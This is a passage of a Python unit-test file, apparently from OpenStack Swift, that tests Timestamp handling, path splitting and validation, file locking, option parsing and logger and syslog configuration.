timestamp, float(normal), value))
def test_raw(self):
expected = 140243640891203
timestamp = utils.Timestamp(1402436408.91203)
self.assertEqual(expected, timestamp.raw)
# 'raw' does not include offset
timestamp = utils.Timestamp(1402436408.91203, 0xf0)
self.assertEqual(expected, timestamp.raw)
def test_delta(self):
def _assertWithinBounds(expected, timestamp):
tolerance = 0.00001
minimum = expected - tolerance
maximum = expected + tolerance
self.assertTrue(float(timestamp) > minimum)
self.assertTrue(float(timestamp) < maximum)
timestamp = utils.Timestamp(1402436408.91203, delta=100)
_assertWithinBounds(1402436408.91303, timestamp)
self.assertEqual(140243640891303, timestamp.raw)
timestamp = utils.Timestamp(1402436408.91203, delta=-100)
_assertWithinBounds(1402436408.91103, timestamp)
self.assertEqual(140243640891103, timestamp.raw)
timestamp = utils.Timestamp(1402436408.91203, delta=0)
_assertWithinBounds(1402436408.91203, timestamp)
self.assertEqual(140243640891203, timestamp.raw)
# delta is independent of offset
timestamp = utils.Timestamp(1402436408.91203, offset=42, delta=100)
self.assertEqual(140243640891303, timestamp.raw)
self.assertEqual(42, timestamp.offset)
# cannot go negative
self.assertRaises(ValueError, utils.Timestamp, 1402436408.91203,
delta=-140243640891203)
def test_int(self):
expected = 1402437965
test_values = (
'1402437965.91203',
'1402437965.91203_00000000',
'1402437965.912030000',
'1402437965.912030000_0000000000000',
'000001402437965.912030000',
'000001402437965.912030000_0000000000',
1402437965.91203,
1402437965.9120300000000000,
1402437965.912029,
1402437965.912029999999999999,
utils.Timestamp(1402437965.91203),
utils.Timestamp(1402437965.91203, offset=0),
utils.Timestamp(1402437965.91203, offset=500),
utils.Timestamp(1402437965.912029),
utils.Timestamp(1402437965.91202999999999999, offset=0),
utils.Timestamp(1402437965.91202999999999999, offset=300),
utils.Timestamp('1402437965.91203'),
utils.Timestamp('1402437965.91203', offset=0),
utils.Timestamp('1402437965.91203', offset=400),
utils.Timestamp('1402437965.912029'),
utils.Timestamp('1402437965.912029', offset=0),
utils.Timestamp('1402437965.912029', offset=200),
utils.Timestamp('1402437965.912029999999999'),
utils.Timestamp('1402437965.912029999999999', offset=0),
utils.Timestamp('1402437965.912029999999999', offset=100),
)
for value in test_values:
timestamp = utils.Timestamp(value)
self.assertEqual(int(timestamp), expected)
self.assertTrue(timestamp > expected)
def test_float(self):
expected = 1402438115.91203
test_values = (
'1402438115.91203',
'1402438115.91203_00000000',
'1402438115.912030000',
'1402438115.912030000_0000000000000',
'000001402438115.912030000',
'000001402438115.912030000_0000000000',
1402438115.91203,
1402438115.9120300000000000,
1402438115.912029,
1402438115.912029999999999999,
utils.Timestamp(1402438115.91203),
utils.Timestamp(1402438115.91203, offset=0),
utils.Timestamp(1402438115.91203, offset=500),
utils.Timestamp(1402438115.912029),
utils.Timestamp(1402438115.91202999999999999, offset=0),
utils.Timestamp(1402438115.91202999999999999, offset=300),
utils.Timestamp('1402438115.91203'),
utils.Timestamp('1402438115.91203', offset=0),
utils.Timestamp('1402438115.91203', offset=400),
utils.Timestamp('1402438115.912029'),
utils.Timestamp('1402438115.912029', offset=0),
utils.Timestamp('1402438115.912029', offset=200),
utils.Timestamp('1402438115.912029999999999'),
utils.Timestamp('1402438115.912029999999999', offset=0),
utils.Timestamp('1402438115.912029999999999', offset=100),
)
tolerance = 0.00001
minimum = expected - tolerance
maximum = expected + tolerance
for value in test_values:
timestamp = utils.Timestamp(value)
self.assertTrue(float(timestamp) > minimum,
'%f is not bigger than %f given %r' % (
timestamp, minimum, value))
self.assertTrue(float(timestamp) < maximum,
'%f is not smaller than %f given %r' % (
timestamp, maximum, value))
# direct comparison of timestamp works too
self.assertTrue(timestamp > minimum,
'%s is not bigger than %f given %r' % (
timestamp.normal, minimum, value))
self.assertTrue(timestamp < maximum,
'%s is not smaller than %f given %r' % (
timestamp.normal, maximum, value))
# ... even against strings
self.assertTrue(timestamp > '%f' % minimum,
'%s is not bigger than %s given %r' % (
timestamp.normal, minimum, value))
self.assertTrue(timestamp < '%f' % maximum,
'%s is not smaller than %s given %r' % (
timestamp.normal, maximum, value))
def test_false(self):
self.assertFalse(utils.Timestamp(0))
self.assertFalse(utils.Timestamp(0, offset=0))
self.assertFalse(utils.Timestamp('0'))
self.assertFalse(utils.Timestamp('0', offset=0))
self.assertFalse(utils.Timestamp(0.0))
self.assertFalse(utils.Timestamp(0.0, offset=0))
self.assertFalse(utils.Timestamp('0.0'))
self.assertFalse(utils.Timestamp('0.0', offset=0))
self.assertFalse(utils.Timestamp(00000000.00000000))
self.assertFalse(utils.Timestamp(00000000.00000000, offset=0))
self.assertFalse(utils.Timestamp('00000000.00000000'))
self.assertFalse(utils.Timestamp('00000000.00000000', offset=0))
def test_true(self):
self.assertTrue(utils.Timestamp(1))
self.assertTrue(utils.Timestamp(1, offset=1))
self.assertTrue(utils.Timestamp(0, offset=1))
self.assertTrue(utils.Timestamp('1'))
self.assertTrue(utils.Timestamp('1', offset=1))
self.assertTrue(utils.Timestamp('0', offset=1))
self.assertTrue(utils.Timestamp(1.1))
self.assertTrue(utils.Timestamp(1.1, offset=1))
self.assertTrue(utils.Timestamp(0.0, offset=1))
self.assertTrue(utils.Timestamp('1.1'))
self.assertTrue(utils.Timestamp('1.1', offset=1))
self.assertTrue(utils.Timestamp('0.0', offset=1))
self.assertTrue(utils.Timestamp(11111111.11111111))
self.assertTrue(utils.Timestamp(11111111.11111111, offset=1))
self.assertTrue(utils.Timestamp(00000000.00000000, offset=1))
self.assertTrue(utils.Timestamp('11111111.11111111'))
self.assertTrue(utils.Timestamp('11111111.11111111', offset=1))
self.assertTrue(utils.Timestamp('00000000.00000000', offset=1))
def test_greater_no_offset(self):
now = time.time()
older = now - 1
timestamp = utils.Timestamp(now)
test_values = (
0, '0', 0.0, '0.0', '0000.0000', '000.000_000',
1, '1', 1.1, '1.1', '1111.1111', '111.111_111',
1402443112.213252, '1402443112.213252', '1402443112.213252_ffff',
older, '%f' % older, '%f_0000ffff' % older,
)
for value in test_values:
other = utils.Timestamp(value)
self.assertNotEqual(timestamp, other) # sanity
self.assertTrue(timestamp > value,
'%r is not greater than %r given %r' % (
timestamp, value, value))
self.assertTrue(timestamp > other,
'%r is not greater than %r given %r' % (
timestamp, other, value))
self.assertTrue(timestamp > other.normal,
'%r is not greater than %r given %r' % (
timestamp, other.normal, value))
self.assertTrue(timestamp > other.internal,
'%r is not greater than %r given %r' % (
timestamp, other.internal, value))
self.assertTrue(timestamp > float(other),
'%r is not greater than %r given %r' % (
timestamp, float(other), value))
self.assertTrue(timestamp > int(other),
'%r is not greater than %r given %r' % (
timestamp, int(other), value))
def test_greater_with_offset(self):
now = time.time()
older = now - 1
test_values = (
0, '0', 0.0, '0.0', '0000.0000', '000.000_000',
1, '1', 1.1, '1.1', '1111.1111', '111.111_111',
1402443346.935174, '1402443346.93517', '1402443346.935169_ffff',
older, '%f' % older, '%f_0000ffff' % older,
now, '%f' % now, '%f_00000000' % now,
)
for offset in range(1, 1000, 100):
timestamp = utils.Timestamp(now, offset=offset)
for value in test_values:
other = utils.Timestamp(value)
self.assertNotEqual(timestamp, other) # sanity
self.assertTrue(timestamp > value,
'%r is not greater than %r given %r' % (
timestamp, value, value))
self.assertTrue(timestamp > other,
'%r is not greater than %r given %r' % (
timestamp, other, value))
self.assertTrue(timestamp > other.normal,
'%r is not greater than %r given %r' % (
timestamp, other.normal, value))
self.assertTrue(timestamp > other.internal,
'%r is not greater than %r given %r' % (
timestamp, other.internal, value))
self.assertTrue(timestamp > float(other),
'%r is not greater than %r given %r' % (
timestamp, float(other), value))
self.assertTrue(timestamp > int(other),
'%r is not greater than %r given %r' % (
timestamp, int(other), value))
def test_smaller_no_offset(self):
now = time.time()
newer = now + 1
timestamp = utils.Timestamp(now)
test_values = (
9999999999.99999, '9999999999.99999', '9999999999.99999_ffff',
newer, '%f' % newer, '%f_0000ffff' % newer,
)
for value in test_values:
other = utils.Timestamp(value)
self.assertNotEqual(timestamp, other) # sanity
self.assertTrue(timestamp < value,
'%r is not smaller than %r given %r' % (
timestamp, value, value))
self.assertTrue(timestamp < other,
'%r is not smaller than %r given %r' % (
timestamp, other, value))
self.assertTrue(timestamp < other.normal,
'%r is not smaller than %r given %r' % (
timestamp, other.normal, value))
self.assertTrue(timestamp < other.internal,
'%r is not smaller than %r given %r' % (
timestamp, other.internal, value))
self.assertTrue(timestamp < float(other),
'%r is not smaller than %r given %r' % (
timestamp, float(other), value))
self.assertTrue(timestamp < int(other),
'%r is not smaller than %r given %r' % (
timestamp, int(other), value))
def test_smaller_with_offset(self):
now = time.time()
newer = now + 1
test_values = (
9999999999.99999, '9999999999.99999', '9999999999.99999_ffff',
newer, '%f' % newer, '%f_0000ffff' % newer,
)
for offset in range(1, 1000, 100):
timestamp = utils.Timestamp(now, offset=offset)
for value in test_values:
other = utils.Timestamp(value)
self.assertNotEqual(timestamp, other) # sanity
self.assertTrue(timestamp < value,
'%r is not smaller than %r given %r' % (
timestamp, value, value))
self.assertTrue(timestamp < other,
'%r is not smaller than %r given %r' % (
timestamp, other, value))
self.assertTrue(timestamp < other.normal,
'%r is not smaller than %r given %r' % (
timestamp, other.normal, value))
self.assertTrue(timestamp < other.internal,
'%r is not smaller than %r given %r' % (
timestamp, other.internal, value))
self.assertTrue(timestamp < float(other),
'%r is not smaller than %r given %r' % (
timestamp, float(other), value))
self.assertTrue(timestamp < int(other),
'%r is not smaller than %r given %r' % (
timestamp, int(other), value))
def test_ordering(self):
given = [
'1402444820.62590_000000000000000a',
'1402444820.62589_0000000000000001',
'1402444821.52589_0000000000000004',
'1402444920.62589_0000000000000004',
'1402444821.62589_000000000000000a',
'1402444821.72589_000000000000000a',
'1402444920.62589_0000000000000002',
'1402444820.62589_0000000000000002',
'1402444820.62589_000000000000000a',
'1402444820.62590_0000000000000004',
'1402444920.62589_000000000000000a',
'1402444820.62590_0000000000000002',
'1402444821.52589_0000000000000002',
'1402444821.52589_0000000000000000',
'1402444920.62589',
'1402444821.62589_0000000000000004',
'1402444821.72589_0000000000000001',
'1402444820.62590',
'1402444820.62590_0000000000000001',
'1402444820.62589_0000000000000004',
'1402444821.72589_0000000000000000',
'1402444821.52589_000000000000000a',
'1402444821.72589_0000000000000004',
'1402444821.62589',
'1402444821.52589_0000000000000001',
'1402444821.62589_0000000000000001',
'1402444821.62589_0000000000000002',
'1402444821.72589_0000000000000002',
'1402444820.62589',
'1402444920.62589_0000000000000001']
expected = [
'1402444820.62589',
'1402444820.62589_0000000000000001',
'1402444820.62589_0000000000000002',
'1402444820.62589_0000000000000004',
'1402444820.62589_000000000000000a',
'1402444820.62590',
'1402444820.62590_0000000000000001',
'1402444820.62590_0000000000000002',
'1402444820.62590_0000000000000004',
'1402444820.62590_000000000000000a',
'1402444821.52589',
'1402444821.52589_0000000000000001',
'1402444821.52589_0000000000000002',
'1402444821.52589_0000000000000004',
'1402444821.52589_000000000000000a',
'1402444821.62589',
'1402444821.62589_0000000000000001',
'1402444821.62589_0000000000000002',
'1402444821.62589_0000000000000004',
'1402444821.62589_000000000000000a',
'1402444821.72589',
'1402444821.72589_0000000000000001',
'1402444821.72589_0000000000000002',
'1402444821.72589_0000000000000004',
'1402444821.72589_000000000000000a',
'1402444920.62589',
'1402444920.62589_0000000000000001',
'1402444920.62589_0000000000000002',
'1402444920.62589_0000000000000004',
'1402444920.62589_000000000000000a',
]
# less visual version
"""
now = time.time()
given = [
utils.Timestamp(now + i, offset=offset).internal
for i in (0, 0.00001, 0.9, 1.0, 1.1, 100.0)
for offset in (0, 1, 2, 4, 10)
]
expected = [t for t in given]
random.shuffle(given)
"""
self.assertEqual(len(given), len(expected)) # sanity
timestamps = [utils.Timestamp(t) for t in given]
# our expected values don't include insignificant offsets
with mock.patch('swift.common.utils.FORCE_INTERNAL', new=False):
self.assertEqual(
[t.internal for t in sorted(timestamps)], expected)
# string sorting works as well
self.assertEqual(
sorted([t.internal for t in timestamps]), expected)
class TestUtils(unittest.TestCase):
"""Tests for swift.common.utils """
def setUp(self):
utils.HASH_PATH_SUFFIX = 'endcap'
utils.HASH_PATH_PREFIX = 'startcap'
def test_lock_path(self):
tmpdir = mkdtemp()
try:
with utils.lock_path(tmpdir, 0.1):
exc = None
success = False
try:
with utils.lock_path(tmpdir, 0.1):
success = True
except LockTimeout as err:
exc = err
self.assertTrue(exc is not None)
self.assertTrue(not success)
finally:
shutil.rmtree(tmpdir)
def test_lock_path_num_sleeps(self):
tmpdir = mkdtemp()
num_short_calls = [0]
exception_raised = [False]
def my_sleep(to_sleep):
if to_sleep == 0.01:
num_short_calls[0] += 1
else:
raise Exception('sleep time changed: %s' % to_sleep)
try:
with mock.patch('swift.common.utils.sleep', my_sleep):
with utils.lock_path(tmpdir):
with utils.lock_path(tmpdir):
pass
except Exception as e:
exception_raised[0] = True
self.assertTrue('sleep time changed' in str(e))
finally:
shutil.rmtree(tmpdir)
self.assertEqual(num_short_calls[0], 11)
self.assertTrue(exception_raised[0])
def test_lock_path_class(self):
tmpdir = mkdtemp()
try:
with utils.lock_path(tmpdir, 0.1, ReplicationLockTimeout):
exc = None
exc2 = None
success = False
try:
with utils.lock_path(tmpdir, 0.1, ReplicationLockTimeout):
success = True
except ReplicationLockTimeout as err:
exc = err
except LockTimeout as err:
exc2 = err
self.assertTrue(exc is not None)
self.assertTrue(exc2 is None)
self.assertTrue(not success)
exc = None
exc2 = None
success = False
try:
with utils.lock_path(tmpdir, 0.1):
success = True
except ReplicationLockTimeout as err:
exc = err
except LockTimeout as err:
exc2 = err
self.assertTrue(exc is None)
self.assertTrue(exc2 is not None)
self.assertTrue(not success)
finally:
shutil.rmtree(tmpdir)
def test_normalize_timestamp(self):
# Test swift.common.utils.normalize_timestamp
self.assertEqual(utils.normalize_timestamp('1253327593.48174'),
"1253327593.48174")
self.assertEqual(utils.normalize_timestamp(1253327593.48174),
"1253327593.48174")
self.assertEqual(utils.normalize_timestamp('1253327593.48'),
"1253327593.48000")
self.assertEqual(utils.normalize_timestamp(1253327593.48),
"1253327593.48000")
self.assertEqual(utils.normalize_timestamp('253327593.48'),
"0253327593.48000")
self.assertEqual(utils.normalize_timestamp(253327593.48),
"0253327593.48000")
self.assertEqual(utils.normalize_timestamp('1253327593'),
"1253327593.00000")
self.assertEqual(utils.normalize_timestamp(1253327593),
"1253327593.00000")
self.assertRaises(ValueError, utils.normalize_timestamp, '')
self.assertRaises(ValueError, utils.normalize_timestamp, 'abc')
def test_normalize_delete_at_timestamp(self):
self.assertEqual(
utils.normalize_delete_at_timestamp(1253327593),
'1253327593')
self.assertEqual(
utils.normalize_delete_at_timestamp(1253327593.67890),
'1253327593')
self.assertEqual(
utils.normalize_delete_at_timestamp('1253327593'),
'1253327593')
self.assertEqual(
utils.normalize_delete_at_timestamp('1253327593.67890'),
'1253327593')
self.assertEqual(
utils.normalize_delete_at_timestamp(-1253327593),
'0000000000')
self.assertEqual(
utils.normalize_delete_at_timestamp(-1253327593.67890),
'0000000000')
self.assertEqual(
utils.normalize_delete_at_timestamp('-1253327593'),
'0000000000')
self.assertEqual(
utils.normalize_delete_at_timestamp('-1253327593.67890'),
'0000000000')
self.assertEqual(
utils.normalize_delete_at_timestamp(71253327593),
'9999999999')
self.assertEqual(
utils.normalize_delete_at_timestamp(71253327593.67890),
'9999999999')
self.assertEqual(
utils.normalize_delete_at_timestamp('71253327593'),
'9999999999')
self.assertEqual(
utils.normalize_delete_at_timestamp('71253327593.67890'),
'9999999999')
self.assertRaises(ValueError, utils.normalize_timestamp, '')
self.assertRaises(ValueError, utils.normalize_timestamp, 'abc')
def test_last_modified_date_to_timestamp(self):
expectations = {
'1970-01-01T00:00:00.000000': 0.0,
'2014-02-28T23:22:36.698390': 1393629756.698390,
'2011-03-19T04:03:00.604554': 1300507380.604554,
}
for last_modified, ts in expectations.items():
real = utils.last_modified_date_to_timestamp(last_modified)
self.assertEqual(real, ts, "failed for %s" % last_modified)
def test_last_modified_date_to_timestamp_when_system_not_UTC(self):
try:
old_tz = os.environ.get('TZ')
# Western Argentina Summer Time. Found in glibc manual; this
# timezone always has a non-zero offset from UTC, so this test is
# always meaningful.
os.environ['TZ'] = 'WART4WARST,J1/0,J365/25'
self.assertEqual(utils.last_modified_date_to_timestamp(
'1970-01-01T00:00:00.000000'),
0.0)
finally:
if old_tz is not None:
os.environ['TZ'] = old_tz
else:
os.environ.pop('TZ')
def test_backwards(self):
# Test swift.common.utils.backward
# The lines are designed so that the function would encounter
# all of the boundary conditions and typical conditions.
# Block boundaries are marked with '<>' characters
blocksize = 25
lines = [b'123456789x12345678><123456789\n', # block larger than rest
b'123456789x123>\n', # block ends just before \n character
b'123423456789\n',
b'123456789x\n', # block ends at the end of line
b'<123456789x123456789x123\n',
b'<6789x123\n', # block ends at the beginning of the line
b'6789x1234\n',
b'1234><234\n', # block ends typically in the middle of line
b'123456789x123456789\n']
with TemporaryFile() as f:
for line in lines:
f.write(line)
count = len(lines) - 1
for line in utils.backward(f, blocksize):
self.assertEqual(line, lines[count].split(b'\n')[0])
count -= 1
# Empty file case
with TemporaryFile('r') as f:
self.assertEqual([], list(utils.backward(f)))
def test_mkdirs(self):
testdir_base = mkdtemp()
testroot = os.path.join(testdir_base, 'mkdirs')
try:
self.assertTrue(not os.path.exists(testroot))
utils.mkdirs(testroot)
self.assertTrue(os.path.exists(testroot))
utils.mkdirs(testroot)
self.assertTrue(os.path.exists(testroot))
rmtree(testroot, ignore_errors=1)
testdir = os.path.join(testroot, 'one/two/three')
self.assertTrue(not os.path.exists(testdir))
utils.mkdirs(testdir)
self.assertTrue(os.path.exists(testdir))
utils.mkdirs(testdir)
self.assertTrue(os.path.exists(testdir))
rmtree(testroot, ignore_errors=1)
open(testroot, 'wb').close()
self.assertTrue(not os.path.exists(testdir))
self.assertRaises(OSError, utils.mkdirs, testdir)
os.unlink(testroot)
finally:
rmtree(testdir_base)
def test_split_path(self):
# Test swift.common.utils.split_account_path
self.assertRaises(ValueError, utils.split_path, '')
self.assertRaises(ValueError, utils.split_path, '/')
self.assertRaises(ValueError, utils.split_path, '//')
self.assertEqual(utils.split_path('/a'), ['a'])
self.assertRaises(ValueError, utils.split_path, '//a')
self.assertEqual(utils.split_path('/a/'), ['a'])
self.assertRaises(ValueError, utils.split_path, '/a/c')
self.assertRaises(ValueError, utils.split_path, '//c')
self.assertRaises(ValueError, utils.split_path, '/a/c/')
self.assertRaises(ValueError, utils.split_path, '/a//')
self.assertRaises(ValueError, utils.split_path, '/a', 2)
self.assertRaises(ValueError, utils.split_path, '/a', 2, 3)
self.assertRaises(ValueError, utils.split_path, '/a', 2, 3, True)
self.assertEqual(utils.split_path('/a/c', 2), ['a', 'c'])
self.assertEqual(utils.split_path('/a/c/o', 3), ['a', 'c', 'o'])
self.assertRaises(ValueError, utils.split_path, '/a/c/o/r', 3, 3)
self.assertEqual(utils.split_path('/a/c/o/r', 3, 3, True),
['a', 'c', 'o/r'])
self.assertEqual(utils.split_path('/a/c', 2, 3, True),
['a', 'c', None])
self.assertRaises(ValueError, utils.split_path, '/a', 5, 4)
self.assertEqual(utils.split_path('/a/c/', 2), ['a', 'c'])
self.assertEqual(utils.split_path('/a/c/', 2, 3), ['a', 'c', ''])
try:
utils.split_path('o\nn e', 2)
except ValueError as err:
self.assertEqual(str(err), 'Invalid path: o%0An%20e')
try:
utils.split_path('o\nn e', 2, 3, True)
except ValueError as err:
self.assertEqual(str(err), 'Invalid path: o%0An%20e')
def test_validate_device_partition(self):
# Test swift.common.utils.validate_device_partition
utils.validate_device_partition('foo', 'bar')
self.assertRaises(ValueError,
utils.validate_device_partition, '', '')
self.assertRaises(ValueError,
utils.validate_device_partition, '', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', '')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo/bar', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', 'foo/bar')
self.assertRaises(ValueError,
utils.validate_device_partition, '.', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, '..', 'foo')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', '.')
self.assertRaises(ValueError,
utils.validate_device_partition, 'foo', '..')
try:
utils.validate_device_partition('o\nn e', 'foo')
except ValueError as err:
self.assertEqual(str(err), 'Invalid device: o%0An%20e')
try:
utils.validate_device_partition('foo', 'o\nn e')
except ValueError as err:
self.assertEqual(str(err), 'Invalid partition: o%0An%20e')
def test_NullLogger(self):
# Test swift.common.utils.NullLogger
sio = StringIO()
nl = utils.NullLogger()
nl.write('test')
self.assertEqual(sio.getvalue(), '')
def test_LoggerFileObject(self):
orig_stdout = sys.stdout
orig_stderr = sys.stderr
sio = StringIO()
handler = logging.StreamHandler(sio)
logger = logging.getLogger()
logger.addHandler(handler)
lfo_stdout = utils.LoggerFileObject(logger)
lfo_stderr = utils.LoggerFileObject(logger)
lfo_stderr = utils.LoggerFileObject(logger, 'STDERR')
print('test1')
self.assertEqual(sio.getvalue(), '')
sys.stdout = lfo_stdout
print('test2')
self.assertEqual(sio.getvalue(), 'STDOUT: test2\n')
sys.stderr = lfo_stderr
print('test4', file=sys.stderr)
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n')
sys.stdout = orig_stdout
print('test5')
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n')
print('test6', file=sys.stderr)
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n'
'STDERR: test6\n')
sys.stderr = orig_stderr
print('test8')
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n'
'STDERR: test6\n')
lfo_stdout.writelines(['a', 'b', 'c'])
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n'
'STDERR: test6\nSTDOUT: a#012b#012c\n')
lfo_stdout.close()
lfo_stderr.close()
lfo_stdout.write('d')
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n'
'STDERR: test6\nSTDOUT: a#012b#012c\nSTDOUT: d\n')
lfo_stdout.flush()
self.assertEqual(sio.getvalue(), 'STDOUT: test2\nSTDERR: test4\n'
'STDERR: test6\nSTDOUT: a#012b#012c\nSTDOUT: d\n')
for lfo in (lfo_stdout, lfo_stderr):
got_exc = False
try:
for line in lfo:
pass
except Exception:
got_exc = True
self.assertTrue(got_exc)
got_exc = False
try:
for line in lfo:
pass
except Exception:
got_exc = True
self.assertTrue(got_exc)
self.assertRaises(IOError, lfo.read)
self.assertRaises(IOError, lfo.read, 1024)
self.assertRaises(IOError, lfo.readline)
self.assertRaises(IOError, lfo.readline, 1024)
lfo.tell()
def test_parse_options(self):
# Get a file that is definitely on disk
with NamedTemporaryFile() as f:
conf_file = f.name
conf, options = utils.parse_options(test_args=[conf_file])
self.assertEqual(conf, conf_file)
# assert defaults
self.assertEqual(options['verbose'], False)
self.assertTrue('once' not in options)
# assert verbose as option
conf, options = utils.parse_options(test_args=[conf_file, '-v'])
self.assertEqual(options['verbose'], True)
# check once option
conf, options = utils.parse_options(test_args=[conf_file],
once=True)
self.assertEqual(options['once'], False)
test_args = [conf_file, '--once']
conf, options = utils.parse_options(test_args=test_args, once=True)
self.assertEqual(options['once'], True)
# check options as arg parsing
test_args = [conf_file, 'once', 'plugin_name', 'verbose']
conf, options = utils.parse_options(test_args=test_args, once=True)
self.assertEqual(options['verbose'], True)
self.assertEqual(options['once'], True)
self.assertEqual(options['extra_args'], ['plugin_name'])
def test_parse_options_errors(self):
orig_stdout = sys.stdout
orig_stderr = sys.stderr
stdo = StringIO()
stde = StringIO()
utils.sys.stdout = stdo
utils.sys.stderr = stde
self.assertRaises(SystemExit, utils.parse_options, once=True,
test_args=[])
self.assertTrue('missing config' in stdo.getvalue())
        # verify the conf file must exist; the context manager deletes the
        # temp file as soon as the with block exits
with NamedTemporaryFile() as f:
conf_file = f.name
self.assertRaises(SystemExit, utils.parse_options, once=True,
test_args=[conf_file])
self.assertTrue('unable to locate' in stdo.getvalue())
# reset stdio
utils.sys.stdout = orig_stdout
utils.sys.stderr = orig_stderr
def test_dump_recon_cache(self):
testdir_base = mkdtemp()
testcache_file = os.path.join(testdir_base, 'cache.recon')
logger = utils.get_logger(None, 'server', log_route='server')
try:
submit_dict = {'key1': {'value1': 1, 'value2': 2}}
utils.dump_recon_cache(submit_dict, testcache_file, logger)
fd = open(testcache_file)
file_dict = json.loads(fd.readline())
fd.close()
self.assertEqual(submit_dict, file_dict)
# Use a nested entry
submit_dict = {'key1': {'key2': {'value1': 1, 'value2': 2}}}
result_dict = {'key1': {'key2': {'value1': 1, 'value2': 2},
'value1': 1, 'value2': 2}}
utils.dump_recon_cache(submit_dict, testcache_file, logger)
fd = open(testcache_file)
file_dict = json.loads(fd.readline())
fd.close()
self.assertEqual(result_dict, file_dict)
finally:
rmtree(testdir_base)
def test_get_logger(self):
sio = StringIO()
logger = logging.getLogger('server')
logger.addHandler(logging.StreamHandler(sio))
logger = utils.get_logger(None, 'server', log_route='server')
logger.warn('test1')
self.assertEqual(sio.getvalue(), 'test1\n')
logger.debug('test2')
self.assertEqual(sio.getvalue(), 'test1\n')
logger = utils.get_logger({'log_level': 'DEBUG'}, 'server',
log_route='server')
logger.debug('test3')
self.assertEqual(sio.getvalue(), 'test1\ntest3\n')
        # Doesn't really test that the log facility is truly being used all
        # the way to syslog, but it at least exercises the code.
logger = utils.get_logger({'log_facility': 'LOG_LOCAL3'}, 'server',
log_route='server')
logger.warn('test4')
self.assertEqual(sio.getvalue(),
'test1\ntest3\ntest4\n')
# make sure debug doesn't log by default
logger.debug('test5')
self.assertEqual(sio.getvalue(),
'test1\ntest3\ntest4\n')
# make sure notice lvl logs by default
logger.notice('test6')
self.assertEqual(sio.getvalue(),
'test1\ntest3\ntest4\ntest6\n')
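    # Swap utils.SysLogHandler for a stub that records its constructor args,
    # so we can assert how log_facility, log_address, log_udp_host and
    # log_udp_port are plumbed through get_logger(), including the fallback
    # to UDP when the configured address is not a usable UNIX domain socket.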
def test_get_logger_sysloghandler_plumbing(self):
orig_sysloghandler = utils.SysLogHandler
syslog_handler_args = []
def syslog_handler_catcher(*args, **kwargs):
syslog_handler_args.append((args, kwargs))
return orig_sysloghandler(*args, **kwargs)
syslog_handler_catcher.LOG_LOCAL0 = orig_sysloghandler.LOG_LOCAL0
syslog_handler_catcher.LOG_LOCAL3 = orig_sysloghandler.LOG_LOCAL3
try:
utils.SysLogHandler = syslog_handler_catcher
utils.get_logger({
'log_facility': 'LOG_LOCAL3',
}, 'server', log_route='server')
expected_args = [((), {'address': '/dev/log',
'facility': orig_sysloghandler.LOG_LOCAL3})]
if not os.path.exists('/dev/log') or \
os.path.isfile('/dev/log') or \
os.path.isdir('/dev/log'):
                # Since the syslog socket on OS X lives at /var/run/syslog,
                # there will be a fallback to UDP.
expected_args.append(
((), {'facility': orig_sysloghandler.LOG_LOCAL3}))
self.assertEqual(expected_args, syslog_handler_args)
syslog_handler_args = []
utils.get_logger({
'log_facility': 'LOG_LOCAL3',
'log_address': '/foo/bar',
}, 'server', log_route='server')
self.assertEqual([
((), {'address': '/foo/bar',
'facility': orig_sysloghandler.LOG_LOCAL3}),
# Second call is because /foo/bar didn't exist (and wasn't a
# UNIX domain socket).
((), {'facility': orig_sysloghandler.LOG_LOCAL3})],
syslog_handler_args)
# Using UDP with default port
syslog_handler_args = []
utils.get_logger({
'log_udp_host': 'syslog.funtimes.com',
}, 'server', log_route='server')
self.assertEqual([
((), {'address': ('syslog.funtimes.com',
logging.handlers.SYSLOG_UDP_PORT),
'facility': orig_sysloghandler.LOG_LOCAL0})],
syslog_handler_args)
# Using UDP with non-default port
syslog_handler_args = []
utils.get_logger({
'log_udp_host': 'syslog.funtimes.com',
'log_udp_port': '2123',
}, 'server', log_route='server')
self.assertEqual([
((), {'address': ('syslog.funtimes.com', 2123),
'facility': orig_sysloghandler.LOG_LOCAL0})],
syslog_handler_args)
finally:
utils.SysLogHandler = orig_sysloghandler
@reset_logger_state
def test_clean_logger_exception(self):
# setup stream logging
sio = StringIO()
logger = utils.get_logger(None)
handler = logging.StreamHandler(sio)
logger.logger.addHandler(handler)
def strip_value(sio):
sio.seek(0)
v = sio.getvalue()
sio.truncate(0)
return v
def log_exception(exc):
try:
raise exc
except (Exception, Timeout):
logger.exception('blah')
try:
# establish base case
self.assertEqual(strip_value(sio), '')
logger.info('test')
self.assertEqual(strip_value(sio), 'test\n')
self.assertEqual(strip_value(sio), '')
logger.info('test')
logger.info('test')
self.assertEqual(strip_value(sio), 'test\ntest\n')
self.assertEqual(strip_value(sio), '')
# test OSError
for en in (errno.EIO, errno.ENOSPC):
log_exception(OSError(en, 'my %s error message' % en))
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('my %s error message' % en in log_msg)
# unfiltered
log_exception(OSError())
self.assertTrue('Traceback' in strip_value(sio))
# test socket.error
log_exception(socket.error(errno.ECONNREFUSED,
'my error message'))
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('errno.ECONNREFUSED message test' not in log_msg)
self.assertTrue('Connection refused' in log_msg)
log_exception(socket.error(errno.EHOSTUNREACH,
'my error message'))
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('my error message' not in log_msg)
self.assertTrue('Host unreachable' in log_msg)
log_exception(socket.error(errno.ETIMEDOUT, 'my error message'))
log_msg = strip_value(sio)
self.assertTrue('Traceback' not in log_msg)
self.assertTrue('my error message' not in log_msg)
self.assertTrue('Connection timeout' in log_msg)
# unfiltered
log_exception(socket.error(0, 'my error message'))
log_msg = strip_value(sio)
self.assertTrue('Traceback' in log_msg)
self.assertTrue('my error message' in log_msg)
